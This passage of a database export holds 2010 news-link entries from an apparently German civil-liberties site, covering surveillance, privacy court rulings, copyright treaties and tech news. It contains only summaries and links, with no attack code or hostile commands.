&lt;p&gt;Überwachungskameras nutzen präventiv die biometrischen Daten aus Pässen, um Personen zu identifizieren. Wie die veröffentlichten Dokumente verraten, sollen durch mangelhaft konzipierte Umfragen unter Polizisten stereotype Gefährder-Profile geschaffen werden: Wie sehen Taschendiebe, Hooligans oder Terroristen aus? Woran erkennt man Vandalismus, Überfälle oder Personen, die Hilfe benötigen? Das Projekt weiß eine Antwort darauf: Generell ist jeder verdächtig, der auf der Straße läuft, rennt oder zu schnell fährt. Wer im öffentlichen Nahverkehr auf dem Fußboden sitzt, zu lange mitfährt oder sein Gepäck vergisst, muss ebenfalls mit Maßnahmen der Sicherheitskräfte rechnen. Genauso verdächtig sind "herumlungern", sich mit zu vielen Personen treffen und fluchen.
&lt;/p&gt;
&lt;p&gt;Anhand der gewonnenen Profile sollen die automatisierten Programme lernen, Gefährder selbständig zu erkennen. Angesichts der mangelhaften Ausgangsdaten werden somit falschen Anschuldigungen Tür und Tor geöffnet.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.piratenpartei.de/100908-Piratenpartei-veroeffentlicht-INDECT-Dokumente</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/piratenparteiveroffentlichtindect-dokumenteeu.png</field><field type="SlugField" name="slug">piratenparteiveroffentlichtindect-dokumenteeu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-08 15:31:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bürgerrechte indect privatssphäre surveillance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="471" model="submitter.newsentry"><field type="CharField" name="title"> Grüne starten Hackerangriff auf FDP : netzpolitik.org</field><field type="TextField" name="excerpt">FDP ist sauer, weil jemand deren Abstimmung genutzt hat.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;FDP ist sauer, weil jemand deren Abstimmung genutzt hat.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/grune-starten-hackerangriff-auf-fdp/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/08/grunestartenhackerangriffauffdpnetzpoliti.png</field><field type="SlugField" name="slug">grunestartenhackerangriffauffdpnetzpoliti</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-08 15:26:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">fdp</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="470" model="submitter.newsentry"><field type="CharField" name="title">Virginia Court of Appeals: law enforcement should have the right to track criminal suspects with GPS, even without a warrant.</field><field type="TextField" name="excerpt">The Virginia Court of Appeals ruled today that law enforcement should have the right to track criminal suspects with GPS, even without a warrant: "In a case that prompted warnings of Orwellian snooping by the government, the court unanimously ruled that Fairfax County Police did nothing wrong when they planted a GPS device on the bumper of a registered sex offender's work van without obtaining a warrant."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Virginia Court of Appeals ruled today that law enforcement should have the right to track criminal suspects with GPS, even without a warrant: "In a case that prompted warnings of Orwellian snooping by the government, the court unanimously ruled that Fairfax County Police did nothing wrong when they planted a GPS device on the bumper of a registered sex offender's work van without obtaining a warrant."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wtvr.com/news/dp-va--gpstracking-appea0907sep07,0,7510292.story</field><field type="FileField" name="page_screenshot">page_shots/2010/09/08/no_page_shot.png</field><field type="SlugField" name="slug">virginiacourtofappealslawenforcementshould</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-08 14:08:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">bürgerrechte, eff, gps, law enforcement, polizeistaat, tracking, urteil</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="469" model="submitter.newsentry"><field type="CharField" name="title">ACLU + NYCLU are challenging the [US] government's claimed authority to search, detain, and copy electronic devices at the country's international borders without any suspicion of wrongdoing.</field><field type="TextField" name="excerpt">The ACLU today announced that together with the New York Civil Liberties Union (NYCLU), and the National Association of Criminal Defense Lawyers, it has filed a lawsuit "challenging the [US] government's claimed authority to search, detain, and copy electronic devices -- including laptops, cell phones, cameras, etc. -- at the country's international borders without any suspicion of wrongdoing." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The ACLU today announced that together with the New York Civil Liberties Union (NYCLU), and the National Association of Criminal Defense Lawyers, it has filed a lawsuit "challenging the [US] government's claimed authority to search, detain, and copy electronic devices -- including laptops, cell phones, cameras, etc. -- at the country's international borders without any suspicion of wrongdoing."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.aclu.org/blog/free-speech-technology-and-liberty/aclu-challenges-laptop-searches-and-seizures-border</field><field type="FileField" name="page_screenshot">page_shots/2010/09/08/aclunycluarechallengingtheusgovernments.png</field><field type="SlugField" name="slug">aclunycluarechallengingtheusgovernments</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-08 14:05:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">aclu bürgerrechte eff tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="468" model="submitter.newsentry"><field type="CharField" name="title">Bundesweites Zentralregister ab 2013: GEZ soll vollen Zugriff auf Daten erhalten | NGZ-Online</field><field type="TextField" name="excerpt">Wer da dachte mit der Pauschalabgabe für Rundfunk wird die GEZ aufgelöst...
Die Länder wollen die Bürger verpflichten, gegenüber der GEZ umfangreiche Auskünfte zu geben. Bei Weigerung drohen Zwangsvollstreckung und Bußgelder.
Dem Entwurf zufolge soll die GEZ, der heute kein Bürger auch nur die Tür öffnen muss, künftig vollen Zugriff auf die Daten der örtlichen Einwohnermeldeämter haben "und bei öffentlichen und nichtöffentlichen Stellen ohne Kenntnis des Betroffenen" weitere Bürger-Daten erheben dürfen. Die ARD-Rundfunkanstalten sollen diese Daten untereinander austauschen dürfen.
Um die Gebührenpflicht feststellen zu können, soll jeder Inhaber einer Wohnung verpflichtet werden, der GEZ umfangreiche persönliche Angaben auch über Mitbewohner zu machen. Bei Weigerung soll die GEZ Zwangsvollstreckungen gegen Bürger durchsetzen oder Grundstückseigentümer und Hausverwaltungen in Haftung nehmen dürfen. Im Zuge der Umstellung soll auch die weitgehende Gebührenbefreiung für rund 580 000 Behinderte künftig entfallen. Entlastet werden in dem Entwurf große Unternehmen und die Inhaber von Zweitwohnsitzen und Ferienwohnungen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wer da dachte mit der Pauschalabgabe für Rundfunk wird die GEZ aufgelöst...
&lt;/p&gt;
&lt;p&gt;Die Länder wollen die Bürger verpflichten, gegenüber der GEZ umfangreiche Auskünfte zu geben. Bei Weigerung drohen Zwangsvollstreckung und Bußgelder.
&lt;/p&gt;
&lt;p&gt;Dem Entwurf zufolge soll die GEZ, der heute kein Bürger auch nur die Tür öffnen muss, künftig vollen Zugriff auf die Daten der örtlichen Einwohnermeldeämter haben "und bei öffentlichen und nichtöffentlichen Stellen ohne Kenntnis des Betroffenen" weitere Bürger-Daten erheben dürfen. Die ARD-Rundfunkanstalten sollen diese Daten untereinander austauschen dürfen.
&lt;/p&gt;
&lt;p&gt;Um die Gebührenpflicht feststellen zu können, soll jeder Inhaber einer Wohnung verpflichtet werden, der GEZ umfangreiche persönliche Angaben auch über Mitbewohner zu machen. Bei Weigerung soll die GEZ Zwangsvollstreckungen gegen Bürger durchsetzen oder Grundstückseigentümer und Hausverwaltungen in Haftung nehmen dürfen. Im Zuge der Umstellung soll auch die weitgehende Gebührenbefreiung für rund 580 000 Behinderte künftig entfallen. Entlastet werden in dem Entwurf große Unternehmen und die Inhaber von Zweitwohnsitzen und Ferienwohnungen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.ngz-online.de/politik/deutschland/GEZ-soll-vollen-Zugriff-auf-Daten-erhalten_aid_903357.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/07/bundesweiteszentralregisterab2013gezsollvol.png</field><field type="SlugField" name="slug">bundesweiteszentralregisterab2013gezsollvol</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-07 21:59:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">gez</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="467" model="submitter.newsentry"><field type="CharField" name="title">Courts May Require Search Warrants for Cell Phone Location Records</field><field type="TextField" name="excerpt">Ami-Zeugs:
This morning, the Third Circuit Court of Appeals in Philadelphia issued its highly anticipated ruling in a hotly contested cell phone location privacy case. EFF filed a friend-of-the-court brief and participated at oral argument in the case, arguing that federal electronic privacy law gives judges the discretion to deny government requests for cell phone location data when the government fails to show probable cause that a crime has been committed.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ami-Zeugs:
This morning, the Third Circuit Court of Appeals in Philadelphia issued its highly anticipated ruling in a hotly contested cell phone location privacy case. EFF filed a friend-of-the-court brief and participated at oral argument in the case, arguing that federal electronic privacy law gives judges the discretion to deny government requests for cell phone location data when the government fails to show probable cause that a crime has been committed.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/09/breaking-news-eff-location-privacy-win-courts-may</field><field type="FileField" name="page_screenshot">page_shots/2010/09/07/courtsmayrequiresearchwarrantsforcellphone.png</field><field type="SlugField" name="slug">courtsmayrequiresearchwarrantsforcellphone</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-07 21:45:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">gsm tracking warrant</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="466" model="submitter.newsentry"><field type="CharField" name="title">Latest leaked draft of secret copyright treaty: US trying to cram DRM rules down the world's throats</field><field type="TextField" name="excerpt">Particularly disturbing is the growing support for "three-strikes" copyright rules that would disconnect whole families from the Internet if one member of the household was accused (without proof) of copyright infringement. The other big US agenda item is cramming pro-Digital Rights Management (DRM) rules down the world's throats that go way beyond the current obligations under the UN's WIPO Copyright Treaty. In the US version, breaking DRM is always illegal, even if you're not committing any copyright violation -- so breaking the DRM on your iPad to install software you bought from someone who hasn't gone through the Apple approval process is illegal, even though the transaction involves no illicit copying.
Ironically, this DRM push comes just as the US courts and regulators have begun to erode the US's own extreme rules on the subject. Or perhaps this isn't so surprising: in the past, the US copyright lobby has torpedoed the courts and Congress by getting USA to commit to international agreements that went far beyond the rules that they could push through on their own at home.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Particularly disturbing is the growing support for "three-strikes" copyright rules that would disconnect whole families from the Internet if one member of the household was accused (without proof) of copyright infringement. The other big US agenda item is cramming pro-Digital Rights Management (DRM) rules down the world's throats that go way beyond the current obligations under the UN's WIPO Copyright Treaty. In the US version, breaking DRM is always illegal, even if you're not committing any copyright violation -- so breaking the DRM on your iPad to install software you bought from someone who hasn't gone through the Apple approval process is illegal, even though the transaction involves no illicit copying.
&lt;/p&gt;
&lt;p&gt;Ironically, this DRM push comes just as the US courts and regulators have begun to erode the US's own extreme rules on the subject. Or perhaps this isn't so surprising: in the past, the US copyright lobby has torpedoed the courts and Congress by getting USA to commit to international agreements that went far beyond the rules that they could push through on their own at home.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.michaelgeist.ca/content/view/5285/125/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/07/latestleakeddraftofsecretcopyrighttreatyus.png</field><field type="SlugField" name="slug">latestleakeddraftofsecretcopyrighttreatyus</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-07 16:26:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">acta, bürgerrechte, copyfight, digital media, dmca</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="465" model="submitter.newsentry"><field type="CharField" name="title">Globe Genie: random teleporter for Google Street View</field><field type="TextField" name="excerpt">MIT grad student Joe McMichael's Globe Genie reminds me the Hyperspace button in the Asteroids arcade game. Just hit "Shuffle" and it takes you somewhere random on Earth, via Google's Street View. Simple but effective!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;MIT grad student Joe McMichael's Globe Genie reminds me the Hyperspace button in the Asteroids arcade game. Just hit "Shuffle" and it takes you somewhere random on Earth, via Google's Street View. Simple but effective!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://web.mit.edu/~jmcmicha/www/globegenie/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/07/globegenierandomteleporterforgooglestreetv.png</field><field type="SlugField" name="slug">globegenierandomteleporterforgooglestreetv</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-07 16:18:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">google openstreetmap streetview</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="464" model="submitter.newsentry"><field type="CharField" name="title">Whiskey from diabetics' urine</field><field type="TextField" name="excerpt">Gilpin Family whisky is a new single malt whisky made from the urine of diabetics. Creator James Gilpin doesn't sell the stuff, but rather gives away bottles as a public health statement.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Gilpin Family whisky is a new single malt whisky made from the urine of diabetics. Creator James Gilpin doesn't sell the stuff, but rather gives away bottles as a public health statement.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.independent.co.uk/life-style/food-and-drink/whizky-worlds-first-bio-whisky-aged-with-granny-whiz-2070491.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/07/whiskeyfromdiabeticsurine_.png</field><field type="SlugField" name="slug">whiskeyfromdiabeticsurine</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-07 13:47:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">diabetes gesundheit nahrungsmittel urine whiskey</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="463" model="submitter.newsentry"><field type="CharField" name="title">heise online - Internet Explorer: Datenklau durch zwei Jahre alte Lücke</field><field type="TextField" name="excerpt">2 Jahr alte Lücke zur Umgehung der Same Origin Policy.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;2 Jahr alte Lücke zur Umgehung der Same Origin Policy.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Internet-Explorer-Datenklau-durch-zwei-Jahre-alte-Luecke-1073060.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/06/heiseonline-internetexplorerdatenklaudurch.png</field><field type="SlugField" name="slug">heiseonline-internetexplorerdatenklaudurch</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-06 20:18:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">ie microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="462" model="submitter.newsentry"><field type="CharField" name="title">Duke Nukem Forever: Und der King kommt doch (Update) - Golem.de</field><field type="TextField" name="excerpt">Ein Pappaufsteller und eine Twitternachricht: Mit einfachen Mitteln hat Gearbox heute verkündet, dass Duke Nukem Forever im Jahr 2011 kommen wird.
Dreizehn Jahre hat es gedauert, doch nun kümmert sich das Entwicklerstudio Gearbox um den dauerverspäteten und immer wieder aufs Neue angekündigen Shooter Duke Nukem Forever.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein Pappaufsteller und eine Twitternachricht: Mit einfachen Mitteln hat Gearbox heute verkündet, dass Duke Nukem Forever im Jahr 2011 kommen wird.
&lt;/p&gt;
&lt;p&gt;Dreizehn Jahre hat es gedauert, doch nun kümmert sich das Entwicklerstudio Gearbox um den dauerverspäteten und immer wieder aufs Neue angekündigen Shooter Duke Nukem Forever.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1009/77710.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/06/dukenukemforeverundderkingkommtdochupdat.png</field><field type="SlugField" name="slug">dukenukemforeverundderkingkommtdochupdat</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-06 00:20:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">game</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="461" model="submitter.newsentry"><field type="CharField" name="title">AMD switching to easy peel-off laptop stickers Computer Chips &amp; Hardware Technology | Geek.com</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.geek.com/articles/chips/amd-switching-to-easy-peel-off-laptop-stickers-2010092/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/05/amdswitchingtoeasypeel-offlaptopstickersc.png</field><field type="SlugField" name="slug">amdswitchingtoeasypeel-offlaptopstickersc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-05 12:43:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="460" model="submitter.newsentry"><field type="CharField" name="title">PM under fire for new Bill. Washington would control who boards Canadian flights over U.S.</field><field type="TextField" name="excerpt">A bill introduced in Canada's House of Commons would give US Department of Homeland Security officials "final say over who may board aircraft in Canada if they are to fly over the United States en route to a third country." </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;A bill introduced in Canada's House of Commons would give US Department of Homeland Security officials "final say over who may board aircraft in Canada if they are to fly over the United States en route to a third country."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.montrealgazette.com/news/Canada+says+Uncle+wants+your+data/3214360/story.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/04/pmunderfirefornewbillwashingtonwouldcontr.png</field><field type="SlugField" name="slug">pmunderfirefornewbillwashingtonwouldcontr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-04 11:46:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">airport bürgerrechte security terror theater tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="459" model="submitter.newsentry"><field type="CharField" name="title"> Löschwelle für Linuxtag &amp;#8211; Veranstaltungen auf Wikipedia - Gisbers.de - für diejenigen, die es interessiert&amp;#8230;</field><field type="TextField" name="excerpt">Neue Rubrik: Löschvorschlag des Monats
Auf Wikipedia gibt es zur Zeit eine kleine Löschwelle für Linuxtag Veranstaltungen. Nachdem der erste Löschantrag die Seite der OpenRheinRuhr betroffen hat ist der nächste auf die Idee gekommen die Seiten der FrOSCon und des Brandenburger Linux-Infotag ebenfalls zur Löschung vorzuschlagen.
Die Begründung für den Löschungsantrag ist die fehlende Relevanz und das nicht Erreichen der Messlatte für Messen.
Auf den Löschkandidatenseiten entwickelt sich gerade eine interessante Diskussion wie sich Relevanz darstellt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Neue Rubrik: Löschvorschlag des Monats
&lt;/p&gt;
&lt;p&gt;Auf Wikipedia gibt es zur Zeit eine kleine Löschwelle für Linuxtag Veranstaltungen. Nachdem der erste Löschantrag die Seite der OpenRheinRuhr betroffen hat ist der nächste auf die Idee gekommen die Seiten der FrOSCon und des Brandenburger Linux-Infotag ebenfalls zur Löschung vorzuschlagen.
&lt;/p&gt;
&lt;p&gt;Die Begründung für den Löschungsantrag ist die fehlende Relevanz und das nicht Erreichen der Messlatte für Messen.
&lt;/p&gt;
&lt;p&gt;Auf den Löschkandidatenseiten entwickelt sich gerade eine interessante Diskussion wie sich Relevanz darstellt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://gisbers.de/2010/08/25/loschwellefurlinuxtagveranstaltungenaufwikipedia/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/loschwellefurlinuxtag8211veranstaltungen.png</field><field type="SlugField" name="slug">loschwellefurlinuxtag8211veranstaltungen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 22:26:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">löschen wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="11"></object></field></object><object pk="458" model="submitter.newsentry"><field type="CharField" name="title">Spamers are pinging</field><field type="TextField" name="excerpt">Evtl. nur PR? Hab kein Ping.
Security firm Sophos is warning that Apple's Ping social networking service has been blighted by spammers just days after launch.
Read more: http://www.v3.co.uk/v3/news/2269198/ping-pong-spammers#ixzz0yUwfXbMW
The V3 App store has games, downloads and more. Visit the store now.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Evtl. nur PR? Hab kein Ping.
Security firm Sophos is warning that Apple's Ping social networking service has been blighted by spammers just days after launch.
&lt;/p&gt;
&lt;p&gt;Read more: http://www.v3.co.uk/v3/news/2269198/ping-pong-spammers#ixzz0yUwfXbMW
The V3 App store has games, downloads and more. Visit the store now.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.v3.co.uk/v3/news/2269198/ping-pong-spammers</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/spamersarepinging.png</field><field type="SlugField" name="slug">spamersarepinging</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 21:55:16</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">apple ping</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="457" model="submitter.newsentry"><field type="CharField" name="title"> EU-Kommission diskutiert Inhaltefilter/DPI gegen p2p : netzpolitik.org</field><field type="TextField" name="excerpt">Die französische Webseite pcinpact.com hat einige interne Dokumente einer von der EU-Kommission angeleierten Diskussion innerhalb der “Generaldirektion Binnenmarkt und Dienstleistungen” veröffentlicht. Zu den Diskussionsgesprächen wurden Vertreter der Rechteindustrie und der Provider eingeladen, um weitere Durchsetzungsmaßnahmen gegen Urheberrechtsvergehen im Rahmen der IPR-Enforcement-Directive und eine freiwillige Kooperation zwischen ISPs und Rechteindustrie zu diskutieren.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die französische Webseite pcinpact.com hat einige interne Dokumente einer von der EU-Kommission angeleierten Diskussion innerhalb der “Generaldirektion Binnenmarkt und Dienstleistungen” veröffentlicht. Zu den Diskussionsgesprächen wurden Vertreter der Rechteindustrie und der Provider eingeladen, um weitere Durchsetzungsmaßnahmen gegen Urheberrechtsvergehen im Rahmen der IPR-Enforcement-Directive und eine freiwillige Kooperation zwischen ISPs und Rechteindustrie zu diskutieren.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/eu-kommission-diskutiert-inhaltefilterdpi-gegen-p2p/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/eu-kommissiondiskutiertinhaltefilterdpigegen.png</field><field type="SlugField" name="slug">eu-kommissiondiskutiertinhaltefilterdpigegen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 21:51:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">censorship contentmafia eu</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="456" model="submitter.newsentry"><field type="CharField" name="title">Google Wave Developer Blog: Wave open source next steps: "Wave in a Box"</field><field type="TextField" name="excerpt">Immerhin schmeißen sie es nicht in eine Tonne. Google Wave wird FOSS.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Immerhin schmeißen sie es nicht in eine Tonne. Google Wave wird FOSS.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://googlewavedev.blogspot.com/2010/09/wave-open-source-next-steps-wave-in-box.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/03/googlewavedeveloperblogwaveopensourcenext.png</field><field type="SlugField" name="slug">googlewavedeveloperblogwaveopensourcenext</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-03 21:47:26</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">google wave</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="455" model="submitter.newsentry"><field type="CharField" name="title">Pentagon declined to investigate hundreds of purchases of child pornography | The Upshot Yahoo! News - Yahoo! News</field><field type="TextField" name="excerpt">Vllt. hatten sie ja recht und wir müssen ChildPorn sprerren. Verfolgt werden ja die DoD Typen offensichtlich nicht.
A 2006 Immigration and Customs Enforcement investigation into the purchase of child pornography online turned up more than 250 civilian and military employees of the Defense Department -- including some with the highest available security clearance -- who used credit cards or PayPal to purchase images of children in sexual situations. But the Pentagon investigated only a handful of the cases, Defense Department records show.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Vllt. hatten sie ja recht und wir müssen ChildPorn sprerren. Verfolgt werden ja die DoD Typen offensichtlich nicht.
&lt;/p&gt;
&lt;p&gt;A 2006 Immigration and Customs Enforcement investigation into the purchase of child pornography online turned up more than 250 civilian and military employees of the Defense Department -- including some with the highest available security clearance -- who used credit cards or PayPal to purchase images of children in sexual situations. But the Pentagon investigated only a handful of the cases, Defense Department records show.
